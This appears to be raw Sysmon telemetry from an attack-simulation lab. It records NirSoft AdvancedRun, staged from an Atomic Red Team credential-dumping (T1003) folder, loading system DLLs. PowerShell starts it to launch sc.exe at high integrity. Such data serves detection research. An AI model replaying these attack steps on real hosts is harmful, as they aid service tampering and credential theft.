CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.019{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.019{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.019{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003955050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.019{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003955049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.019{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003955048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.023{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /EXEFilename C:\Windows\System32\sc.exeC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003953240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003953239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003953238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 